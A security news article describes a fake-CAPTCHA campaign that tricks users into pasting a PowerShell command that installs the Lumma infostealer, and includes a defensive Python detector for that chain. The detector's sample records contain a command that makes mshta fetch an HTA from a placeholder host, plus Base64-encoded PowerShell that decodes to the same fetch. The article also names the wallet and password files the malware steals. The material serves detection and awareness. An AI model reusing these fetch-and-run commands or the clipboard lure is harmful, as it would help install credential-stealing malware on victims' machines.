Researchers at Qualys have recently uncovered a sophisticated malicious campaign that exploits CAPTCHA verification mechanisms to deliver malware. In this attack, cybercriminals prompt users to “Verify You Are Human” through a deceptive process that ultimately leads to the execution of malicious commands on their systems.
The method involves redirecting unsuspecting users to fake CAPTCHA sites, often by exploiting vulnerabilities in legitimate software or public-facing applications. Once users click the “I’m not a robot” button, they are presented with seemingly harmless verification steps. However, this process is a clever ruse: it automatically copies a malicious script to the clipboard and prompts users to paste it into a terminal window. What appears to be a simple verification procedure is actually an execution chain that triggers a PowerShell command, allowing the Lumma infostealer to be downloaded.
This unique approach makes the threat particularly insidious, as it can operate stealthily and persistently on compromised systems. The Lumma infostealer is highly effective at collecting sensitive data, including passwords, cryptocurrency wallets, and other confidential information. It specifically targets files with names indicative of valuable data, such as those containing keywords like seed.txt, pass.txt, and wallet.txt, which are often associated with cryptocurrency and password management.
To obfuscate its malicious intent, the attack employs Base64 encoding for the scripts, complicating detection efforts. Furthermore, attackers utilize trusted Windows tools like Mshta.exe to download the payload, making it harder for security systems to identify the threat. The Lumma infostealer has gained notoriety as a malware-as-a-service, frequently adapting its delivery methods, including past attacks via fake error messages and compromised accounts.
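As an added illustration (not code from the Qualys report), the following Python sketch shows how a defender might flag the execution chain described above in process-creation telemetry: mshta.exe pulling an HTA from a remote URL, and PowerShell launched with a Base64 -EncodedCommand whose decoded UTF-16LE script references mshta or a URL. The log records, paths and hostnames are constructed placeholders.

```python
import base64
import re

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def is_encoded_flag(arg: str) -> bool:
    """True for -EncodedCommand and the prefixes PowerShell accepts (-e, -ec, -enc, ...)."""
    a = arg.lower().lstrip("-/")
    return bool(a) and (a == "ec" or "encodedcommand".startswith(a))

def decode_encoded_command(token: str):
    """-EncodedCommand carries Base64 of a UTF-16LE string; return the script text or None."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(image: str, cmdline: str) -> list:
    """Return the reasons a process-creation record matches the fake-CAPTCHA chain."""
    reasons = []
    name = image.rsplit("\\", 1)[-1].lower()
    args = cmdline.split()
    if name == "mshta.exe" and any(REMOTE_URL.search(a) for a in args[1:]):
        reasons.append("mshta.exe fetching an HTA from a remote URL")
    if name in ("powershell.exe", "pwsh.exe"):
        for flag, value in zip(args, args[1:]):
            if is_encoded_flag(flag):
                script = decode_encoded_command(value)
                if script is None:
                    reasons.append("PowerShell encoded command that does not decode cleanly")
                elif "mshta" in script.lower() or REMOTE_URL.search(script):
                    reasons.append(f"PowerShell encoded command decodes to: {script.strip()}")
    return reasons

# Constructed sample records (not from the Qualys report); hostnames are placeholders.
ENC = base64.b64encode("mshta https://cdn.example.invalid/verify.hta".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe", "mshta.exe https://cdn.example.invalid/verify.hta"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", f"powershell.exe -w hidden -enc {ENC}"),
    (r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\alice\tools\local_report.hta"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -NoProfile -Command Get-Date"),
]

def scan(events) -> dict:
    """Map the index of each suspicious record to the reasons it was flagged."""
    return {i: r for i, (img, cmd) in enumerate(events) if (r := analyze_event(img, cmd))}

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: " + "; ".join(reasons))
```

Only the two records that reach out to a remote host are flagged; a locally sourced HTA and a plain, unencoded PowerShell command pass through.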
Qualys urges organizations and individuals to employ robust endpoint detection and response tools to counteract these sophisticated attacks. The malware and its command-and-control servers are often hosted on legitimate Content Delivery Networks (CDNs), such as Cloudflare, and the threat landscape continues to evolve. As attackers become increasingly innovative, heightened vigilance and advanced security measures are crucial for safeguarding sensitive data against these emerging threats.